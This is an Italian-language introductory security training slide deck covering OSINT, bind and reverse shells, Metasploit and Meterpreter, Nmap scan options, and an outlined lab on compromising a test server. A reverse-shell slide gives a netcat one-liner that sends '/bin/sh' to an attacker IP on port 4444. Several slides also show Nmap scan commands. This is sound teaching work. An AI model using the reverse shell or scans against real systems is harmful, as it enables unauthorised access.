Sei sulla pagina 1di 27

SECURITY

SSS SOFT
START
Academy

SSS 1
Security Soft Start - Onstairs © 2020
INFORMATION
Lab GATHERING
# Dark web vs Deep web

Ref. https://www.alground.com/site/deep-web-dark-cose/51954/
SSS 3
Security Soft Start- Onstairs © 2020
# OSINT framework
OSINT è un framework focalizzato sull’attività di
information gathering utilizzando tool e risorse open
source.

https://osintframework.com/

SSS 4
Security Soft Start- Onstairs © 2020
REVERSE
Lab SHELL
Bind vs Reverse Shell
La shell è la componente fondamentale e imprescindibile di un sistema operativo
attraverso cui impartire comandi o richiedere l’esecuzione di processi specifici

Bind shell
Hacker
Vittima

Reverse Shell

Hacker
Vittima

SSS 6 6
Security Soft Start- Onstairs © 2020
Perché utilizzare una Reverse Shell?

Hacker
INTERNET

WAN

LAN

Vittima
SSS 7 7
Security Soft Start- Onstairs © 2020
Netcat Reverse Shell

TCP Connection Port 4444

Hacker Vittima
IP 10.10.10.200 IP 10.10.10.100

nc –lvp 4444 nc 10.10.10.200 4444 –e /bin/sh

Listener Connecting…

SSS 8 8
Security Soft Start- Onstairs © 2020
METASPLOIT
Lab
#Metasploit Framework
• Metasploit è uno degli strumenti principali per eseguire l’attività di
exploitating di sistemi. Si tratta di un framework scritto in linguaggio Ruby

SSS 10 10
Security Soft Start- Onstairs © 2020
# Metasploit Core
• REX: Insieme di librerie utilizzabili per la maggior parte dei task

• MSF Core: Fornisce le API basilari e definisce di fatto la struttura portante del
framework

• MSF Base: Fornisce API semplificate per interagire con il framework

SSS 11 11
Security Soft Start- Onstairs © 2020
# Metasploit Modules
• Exploits: insieme di tool necessari allo sfruttamento di bug nel sistema
target

• Payloads: raccolta di codici malevoli

• Auxiliary functions: tool e funzioni ausiliarie (es. scanner)

• Encoders: insieme di tool utilizzati per modificare il formato di codifica


dati

• NOPS: I moduli nop servono per generare istruzioni di tipo no-operation


che hanno lo scopo di riempire il buffer, la memoria di un sistema.
Questo tipo di modulo può tornare utile per la scrittura di exploit
personalizzati.
SSS 12 12
Security Soft Start- Onstairs © 2020
# Exploit o Payload?
• Un Exploits identifica un metodo che è in grado di sfruttare i problemi
che affliggono un sistema operativo oppure una determinata
applicazione al fine di permettere all'attaccante di eseguire un payload
sul sistema attaccato.

• Un Payload è una sequenza di comandi che vengono eseguiti grazie ad


un exploit e che determinano il tipo di impatto che l'attacco avrà sul
target. Un payload potrebbe per esempio essere costituito da un codice
che ha lo scopo di creare un utente amministrativo sul sistema
attaccato, oppure che fornisce all'attaccante una shell dei comandi in
grado di controllare la macchina remota... e così via.

• Gli Encoders sono algoritmi in grado di camuffare un payload al fine di


renderlo non rilevabile dai sistemi di Intrusion Detection (IDS).
SSS 13 13
Security Soft Start- Onstairs © 2020
# Meterpreter
Meterpreter è un tool rilasciato insieme a Metasploit Framework, le cui
caratteristiche principali sono:

• lavora iniettando DLL sulla macchina della vittima

• risiede nella RAM della stessa, non creando alcun file sul suo disco
rigido

• la comunicazione tra attaccante e vittima è criptata

• dispone di una piattaforma per la creazione di estensioni

SSS 14 14
Security Soft Start- Onstairs © 2020
PORT
Lab SCANNING
# Port Scanner NMAP
• E’ possibile utilizzare le seguenti modalitàdi scansione:

Nome Opzione Descrizione


Ping sweep -sP Invio di richieste ICMP Echo Request

TCP Syn Scan (Half-Open scan) -sS Invio pacchetto SYN per apertura
handshake TCP(opzione di default)
UDP Scan -sU Scansione su porte UDP
IP Protol Scan -sO Rilevazione dei protocolli supportati dal
target (es. TCP, ICMP, IGMP..)
Operating System -O Rilevazione sistema operativo target
ARP Ping Scan -PR Scansione eseguita inviando ARP Request
Well Known Port Scan -F Scansione delle prime 1000 porte
maggiormente utilizzate
Application version Scan -sV Rilevazione della versione dei servizi
SSS 16 16
Security Soft Start- Onstairs © 2020
# Port Scanner NMAP
• Durante una scansione le porte possono essere generalmente rilevate nel
seguente stato:

o Open: un’applicazione accetta attivamenteconnessioni

o Closed: è una porta accessibile ma non vi sono applicazioni in ascolto su


tale porta

o Filtered: non è possibile determinare con esatezza lo stato della porta in


quanto un dispositivo (es. Firewall) filtra le richieste ed impedisce il
raggiungimento della porta

o Unfiltered: la porta è accessibile ma Nmap non è in grado di determinarne


lo stato
SSS 17 17
Security Soft Start- Onstairs © 2020
# Port Scanner NMAP
• Durante una scansione le porte possono essere generalmente rilevate nel
seguente stato:

o Open|Filltered: Nmap posiziona le porte in questo stato quando non è in


grado di capire se la porta è aperta oppure filtrata

o Closed|Filltered: Nmap posiziona le porte in questo stato quando non è in


grado di capire se la porta è chiusa oppure filtrata

SSS 18 18
Security Soft Start- Onstairs © 2020
# Port Scanner NMAP
PING SWEEP WELL-KNOWN PORT SCAN
Nmap –sP 10.10.10.50 Nmap –F 10.10.10.50

ARP PING SCAN


Nmap –PR 10.10.10.50

PORT SCAN SO SCAN


Nmap –p 80 10.10.10.50 Nmap –O 10.10.10.50

SSS 19 19
Security Soft Start- Onstairs © 2020
Compromissione di un
Lab Server
Compromissione di un Server
Obiettivo: guadagnare l’accesso non autorizzato al sistema sfruttando le vulnerabilità dei
servizi esposti dal sistema ‘Server Vulnerabile’

Hacker Server Vulnerabile


IP 10.10.10.200 IP 10.10.10.50

SSS 21 21
Security Soft Start- Onstairs © 2020
1 – Port Scanning

SSS 22
Security Soft Start- Onstairs © 2020
2 – Ricerca Bugs & Exploit

SSS 23 23
Security Soft Start- Onstairs © 2020
3 – Ricerca Exploit

SSS 24
Security Soft Start- Onstairs © 2020
4 – Attivazione Modulo

SSS 25
Security Soft Start- Onstairs © 2020
5 – Configurazione Modulo

SSS 26
Security Soft Start- Onstairs © 2020
6 – Esecuzione Exploit

SSS 27
Security Soft Start- Onstairs © 2020

Potrebbero piacerti anche